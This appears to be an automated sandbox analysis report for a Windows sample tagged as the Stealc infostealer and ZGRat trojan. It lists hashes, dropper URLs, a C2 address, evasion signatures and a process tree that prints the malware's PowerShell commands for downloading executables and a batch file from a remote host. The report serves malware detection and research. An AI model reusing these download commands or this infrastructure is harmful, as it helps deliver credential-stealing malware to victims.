Overview

overview

10

Static

static

3

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

$PLUGINSDIR/INetC.dll

windows7-x64

3

$PLUGINSDIR/INetC.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-05-2024 15:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    49KB

  • MD5

    213c0265511727869c959abd24ea3677

  • SHA1

    22ea6fe23eeb57d0048d1b0e2a826dd66c6969d9

  • SHA256

    3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7

  • SHA512

    bfa4d229ade2e47d91f3fb761e68f727aab86980a2697cb06955324e9b61b384569a285edfaa1d1dd7aea95e24d171a770a4f573a19ec795325c68250720f41e

  • SSDEEP

    1536:XferrLkSRoe8C4UZsys0Dh1duFpxFI+PlZ:Xfi3k+oWDBDh1duFpkWlZ

Score
10/10
stealczgratdiscoveryexecutionratstealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000

Extracted

Family

stealc

C2

http://185.172.128.150

Attributes
  • url_path

    /c698e1bc8a2f5e6d.php

Signatures

  • Detect ZGRat V1 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4680
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsn4DA4.tmp\est.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:988
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3360
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3744
      • C:\Users\Admin\AppData\Local\Temp\i1.exe
        i1.exe /SUB=2838 /str=one
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4380
        • C:\Users\Admin\AppData\Local\Temp\u3do.0.exe
          "C:\Users\Admin\AppData\Local\Temp\u3do.0.exe"
          4⤵
          • Executes dropped EXE
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:1076
        • C:\Users\Admin\AppData\Local\Temp\u3do.1.exe
          "C:\Users\Admin\AppData\Local\Temp\u3do.1.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2604
          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4436
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 1156
          4⤵
          • Program crash
          PID:3064
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3840
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4380 -ip 4380
    1⤵
      PID:1912

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      1KB

      MD5

      6195a91754effb4df74dbc72cdf4f7a6

      SHA1

      aba262f5726c6d77659fe0d3195e36a85046b427

      SHA256

      3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5

      SHA512

      ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      16KB

      MD5

      5e79766dc6d8c05c9f1938344e364279

      SHA1

      01e3df80e48ca839cbdfa84841989495fd2db0e0

      SHA256

      9aab27ad18fd6b1169d2ebeb7113f83989465544c48558d8668c3f9c41ba0ffe

      SHA512

      1cdec040cfe29dab7f4fb93758871fb77f5b689f439198688cb012bd30f161ead7a000198b01c223ad40d4e5b95aa3e194a850569661101ab076876cb74aa807

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      16KB

      MD5

      d5ed3d02628557603b0375ccbe8ff85b

      SHA1

      17f3c7b8b2e412c27f6199e77711d194a6cf82bf

      SHA256

      98d23949fe323631d1cad4867835aa4edec29d2e253dd8060cc93202afaf5909

      SHA512

      c48d20ec63871a96ef4f82cc62d9823b1eaafd71f0943df2ce8a20c5ac3182c7c704476bda050fa6418ac8ed242c2fd8b6924baae06480fea1a80548db9fe0b8

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyfaso1a.egt.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\i1.exe
      Filesize

      382KB

      MD5

      278218d2ac13d2d7134e6e9a0828e4d5

      SHA1

      05066b895c41396d0321bc3a032f2f7c2e1811e3

      SHA256

      c697ba11d34c3fcce2efe3d2699c68c933f986b36ccb6b9fb0e9c08fcbcfa7e0

      SHA512

      f1e41a457c01a6ad0ac00e3a004023429d644b1a9bb193afd277f333f1bd4bd00059e37c6df2565b9c7e8bda3cbe3f713b2d39d04ca0c5ad169788efdb230b7d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\nsn4DA4.tmp\INetC.dll
      Filesize

      25KB

      MD5

      40d7eca32b2f4d29db98715dd45bfac5

      SHA1

      124df3f617f562e46095776454e1c0c7bb791cc7

      SHA256

      85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9

      SHA512

      5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\nsn4DA4.tmp\est.bat
      Filesize

      735B

      MD5

      f32d05160acf8325e9a09f09f80d16f4

      SHA1

      46e159b71e6ef99076c4002e1fda134e1d0a86c9

      SHA256

      da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37

      SHA512

      147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\u3do.0.exe
      Filesize

      218KB

      MD5

      5246be38e251c182f838adf4ef42ad40

      SHA1

      fe09ba5ee40d4c4897c8f8e3fa819c13b0e324d9

      SHA256

      7dbf762b2ef2b651a4e8c7b7d9b8996a1de0cfa44119452f1d3f29bfe03dfd86

      SHA512

      a3f7c75a2355935d19c733d67aeff3e08f382ae60c1ba45364974ff91ca779ac5e49c40475fe35b8923a130e8670de0311fdf3c03de935312869e9a9a8b21b14

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\u3do.1.exe
      Filesize

      4.6MB

      MD5

      397926927bca55be4a77839b1c44de6e

      SHA1

      e10f3434ef3021c399dbba047832f02b3c898dbd

      SHA256

      4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

      SHA512

      cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

      Download Submit

    • memory/1076-181-0x0000000000400000-0x0000000002AF3000-memory.dmp

      Filesize

      38.9MB

      Download

    • memory/1076-179-0x0000000000400000-0x0000000002AF3000-memory.dmp

      Filesize

      38.9MB

      Download

    • memory/1076-177-0x0000000000400000-0x0000000002AF3000-memory.dmp

      Filesize

      38.9MB

      Download

    • memory/1076-175-0x0000000000400000-0x0000000002AF3000-memory.dmp

      Filesize

      38.9MB

      Download

    • memory/1076-170-0x0000000000400000-0x0000000002AF3000-memory.dmp

      Filesize

      38.9MB

      Download

    • memory/2604-140-0x0000000000400000-0x00000000008AD000-memory.dmp

      Filesize

      4.7MB

      Download

    • memory/2604-129-0x0000000000400000-0x00000000008AD000-memory.dmp

      Filesize

      4.7MB

      Download

    • memory/3360-26-0x0000000006010000-0x0000000006076000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3360-42-0x0000000073850000-0x0000000074000000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3360-39-0x0000000006AE0000-0x0000000006AFA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3360-38-0x0000000007CA0000-0x000000000831A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3360-37-0x0000000006650000-0x000000000669C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3360-36-0x0000000006610000-0x000000000662E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3360-35-0x0000000006080000-0x00000000063D4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3360-30-0x0000000073850000-0x0000000074000000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3360-25-0x0000000005F30000-0x0000000005F96000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3360-22-0x0000000005E90000-0x0000000005EB2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3360-20-0x0000000073850000-0x0000000074000000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3360-21-0x0000000005730000-0x0000000005D58000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3360-19-0x0000000005070000-0x00000000050A6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3360-18-0x000000007385E000-0x000000007385F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3744-44-0x0000000073850000-0x0000000074000000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3744-60-0x0000000073850000-0x0000000074000000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3744-47-0x0000000005770000-0x0000000005AC4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3744-46-0x0000000073850000-0x0000000074000000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3744-45-0x0000000073850000-0x0000000074000000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3840-76-0x0000000006580000-0x00000000065CC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3840-70-0x0000000005EA0000-0x00000000061F4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4380-92-0x0000000000400000-0x0000000002B1D000-memory.dmp

      Filesize

      39.1MB

      Download

    • memory/4380-108-0x0000000000400000-0x0000000002B1D000-memory.dmp

      Filesize

      39.1MB

      Download

    • memory/4436-161-0x00000261FF9D0000-0x00000261FF9D8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4436-142-0x00000261FE510000-0x00000261FE61A000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/4436-148-0x00000261FE760000-0x00000261FE78A000-memory.dmp

      Filesize

      168KB

      Download

    • memory/4436-149-0x00000261FE7A0000-0x00000261FE852000-memory.dmp

      Filesize

      712KB

      Download

    • memory/4436-150-0x00000261FE8A0000-0x00000261FE8F0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4436-151-0x00000261FE8F0000-0x00000261FE912000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4436-152-0x00000261FC620000-0x00000261FC62A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4436-156-0x00000261FE920000-0x00000261FEC20000-memory.dmp

      Filesize

      3.0MB

      Download

    • memory/4436-158-0x00000261FF9B0000-0x00000261FF9B8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4436-159-0x00000261FFA00000-0x00000261FFA38000-memory.dmp

      Filesize

      224KB

      Download

    • memory/4436-146-0x00000261FC5A0000-0x00000261FC5C4000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4436-147-0x00000261FC5C0000-0x00000261FC5CA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4436-164-0x000002619C060000-0x000002619C082000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4436-163-0x000002619C000000-0x000002619C062000-memory.dmp

      Filesize

      392KB

      Download

    • memory/4436-162-0x000002619BFE0000-0x000002619BFEA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4436-165-0x000002619C5B0000-0x000002619CAD8000-memory.dmp

      Filesize

      5.2MB

      Download

    • memory/4436-168-0x000002619BD60000-0x000002619BD6C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/4436-169-0x00000261FFF20000-0x00000261FFF96000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4436-144-0x00000261FC590000-0x00000261FC59C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/4436-171-0x00000261FFA40000-0x00000261FFA5E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4436-143-0x00000261FC310000-0x00000261FC320000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4436-145-0x00000261FC430000-0x00000261FC444000-memory.dmp

      Filesize

      80KB

      Download

    • memory/4436-141-0x00000261F6D90000-0x00000261FA5C4000-memory.dmp

      Filesize

      56.2MB

      Download

    • memory/4436-160-0x00000261FF9C0000-0x00000261FF9CE000-memory.dmp

      Filesize

      56KB

      Download